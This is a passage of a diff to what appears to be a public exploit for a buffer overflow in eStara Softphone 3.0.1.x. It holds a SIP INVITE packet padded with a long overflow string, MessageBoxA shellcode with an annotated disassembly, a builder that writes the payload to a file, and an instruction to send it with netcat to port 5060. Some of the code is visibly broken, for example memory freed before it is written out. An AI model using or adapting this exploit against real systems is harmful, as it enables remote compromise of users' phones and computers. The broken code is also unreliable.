0x37, 0x38, 0x39, 0x30, 0x31, 0x32, - 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, - 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, - 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, - 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x3A, 0x30, 0x20, 0x50, 0x43, 0x4D, 0x55, 0x2F, - 0x38, 0x30, 0x30, 0x30, 0x0D, 0x0A -}; - - - -unsigned char scode[] = -"\xB8" -"\x75\xC1\xe4\x88" //Address of MessageBoxA + 0x11111111 -"\x2D\x11\x11\x11\x11\x50\x59\x33\xc0\x50\x68" -"\x68\x61\x63\x6b" //"hack" -"\x54\x5a\x50\x52\x52\x50\x53\x51\xc3"; - -//Shellcode: -//B8 75C1e488 MOV EAX,88e4C175 ; MessageBoxA + 0x11111111 to -//2D 11111111 SUB EAX,11111111 ; Make characters readable -//50 PUSH EAX ; xchg registers : eax = 77D3b064 -//59 POP ECX ; Offset to API. -//33C0 XOR EAX,EAX ; Create Null -//50 PUSH EAX ; Put ascii0 end of string -//68 6861636b PUSH 6b636168 ; Create string.= hack -//54 PUSH ESP ; Get the offset to the -//5A POP EDX ; Message String -//MessageBox call -//50 PUSH EAX ; Null Pointer -//52 PUSH EAX ; Message -//52 PUSH EDX ; Message -//50 PUSH EAX ; Null Pointer -//53 PUSH EBX ; Return address: 0x00000000 -//51 PUSH ECX ; Address of MessageBoxA -//C3 RETN ; Jump - - -int main() -{ - FILE *stream; - unsigned char *exploitbuf; - int size; - char *filename = "sip_overbuf_exploit.dat"; - DWORD msgboxaddr = (DWORD)MessageBoxA; //Windows XP EN SP2 MessageBoxA address = 0x77d6e824; - //If others, just change it; - - size = sizeof(invite)+sizeof(jmpesp)+sizeof(end); - exploitbuf = (unsigned char *)malloc(size); - printf("exploitbuf len = %d\n", size); - memcpy(exploitbuf, invite, sizeof(invite)); - memcpy(exploitbuf+sizeof(invite), jmpesp, sizeof(jmpesp)); - memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), end, sizeof(end)); - *(DWORD *)&scode[1] = msgboxaddr+0x11111111; - memcpy(exploitbuf+sizeof(invite)+sizeof(jmpesp), 
scode, sizeof(scode)); - - - if( (stream = fopen( filename, "w+b" )) == NULL ) - printf("Build File Error!!!\n"); - else - printf("Build File %s successful! ^_^\n", filename); - - free(exploitbuf); - fwrite( exploitbuf, size, 1, stream ); - fclose(stream); -} - -// milw0rm.com [2006-01-12] +/*************************************** +eStara Softphone buffer overflow exploit +tested on : + eStara Softphone 3.0.1.14 + |||||| + eStara Softphone 3.0.1.46 +Vender website : http://www.estara.com/softphone/softph.exe + +Run this application, then use nc to send builded packet : +nc -u 127.0.0.1 5060 +#include + +unsigned char invite[] = { + 0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x20, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, + 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x0D, 0x0A, + 0x56, 0x69, 0x61, 0x3A, 0x20, 0x53, 0x49, 0x50, 0x2F, 0x32, 0x2E, 0x30, 0x2F, 0x55, 0x44, 0x50, + 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x3A, 0x33, 0x33, 0x33, 0x33, + 0x3B, 0x62, 0x72, 0x61, 0x6E, 0x63, 0x68, 0x3D, 0x7A, 0x39, 0x68, 0x47, 0x34, 0x62, 0x4B, 0x30, + 0x30, 0x30, 0x30, 0x34, 0x31, 0x37, 0x38, 0x7A, 0x39, 0x68, 0x47, 0x34, 0x62, 0x4B, 0x2E, 0x30, + 0x30, 0x30, 0x30, 0x32, 0x46, 0x32, 0x41, 0x0D, 0x0A, 0x46, 0x72, 0x6F, 0x6D, 0x3A, 0x20, 0x34, + 0x31, 0x37, 0x38, 0x20, 0x3C, 0x73, 0x69, 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, + 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x3B, 0x74, 0x61, 0x67, 0x3D, 0x34, 0x31, 0x37, 0x38, 0x0D, 0x0A, + 0x54, 0x6F, 0x3A, 0x20, 0x52, 0x65, 0x63, 0x65, 0x69, 0x76, 0x65, 0x72, 0x20, 0x3C, 0x73, 0x69, + 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x0D, 0x0A, + 0x43, 0x61, 0x6C, 0x6C, 0x2D, 0x49, 0x44, 0x3A, 0x20, 0x32, 0x34, 0x34, 0x33, 0x30, 0x40, 0x31, + 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x0D, 0x0A, 0x43, 0x53, 0x65, 0x71, 0x3A, + 0x20, 0x31, 0x38, 0x32, 0x32, 0x35, 0x20, 0x49, 0x4E, 0x56, 0x49, 0x54, 0x45, 0x0D, 
0x0A, 0x43, + 0x6F, 0x6E, 0x74, 0x61, 0x63, 0x74, 0x3A, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x3C, 0x73, 0x69, + 0x70, 0x3A, 0x61, 0x40, 0x31, 0x32, 0x37, 0x2E, 0x30, 0x2E, 0x30, 0x2E, 0x31, 0x3E, 0x0D, 0x0A, + 0x45, 0x78, 0x70, 0x69, 0x72, 0x65, 0x73, 0x3A, 0x20, 0x31, 0x32, 0x30, 0x30, 0x0D, 0x0A, 0x4D, + 0x61, 0x78, 0x2D, 0x46, 0x6F, 0x72, 0x77, 0x61, 0x72, 0x64, 0x73, 0x3A, 0x20, 0x37, 0x30, 0x0D, + 0x0A, 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x54, 0x79, 0x70, 0x65, 0x3A, 0x20, 0x61, + 0x70, 0x70, 0x6C, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x2F, 0x73, 0x64, 0x70, 0x0D, 0x0A, + 0x43, 0x6F, 0x6E, 0x74, 0x65, 0x6E, 0x74, 0x2D, 0x4C, 0x65, 0x6E, 0x67, 0x74, 0x68, 0x3A, 0x20, + 0x34, 0x32, 0x32, 0x32, 0x0D, 0x0A, 0x0D, 0x0A, 0x76, 0x3D, 0x30, 0x0D, 0x0A, 0x6F, 0x3D, 0x34, + 0x31, 0x37, 0x38, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x34, 0x31, 0x37, 0x38, 0x20, 0x49, 0x4E, + 0x20, 0x49, 0x50, 0x34, 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, 0x33, 0x2E, 0x36, 0x0D, + 0x0A, 0x73, 0x3D, 0x53, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x20, 0x53, 0x44, 0x50, 0x0D, 0x0A, + 0x63, 0x3D, 0x49, 0x4E, 0x20, 0x49, 0x50, 0x34, 0x20, 0x31, 0x37, 0x32, 0x2E, 0x31, 0x36, 0x2E, + 0x33, 0x2E, 0x36, 0x0D, 0x0A, 0x74, 0x3D, 0x30, 0x20, 0x30, 0x0D, 0x0A, 0x6D, 0x3D, 0x61, 0x75, + 0x64, 0x69, 0x6F, 0x20, 0x39, 0x38, 0x37, 0x36, 0x20, 0x52, 0x54, 0x50, 0x2F, 0x41, 0x56, 0x50, + 0x20, 0x30, 0x0D, 0x0A, 0x61, 0x3D, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 
0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, 0x61, + 0x61, 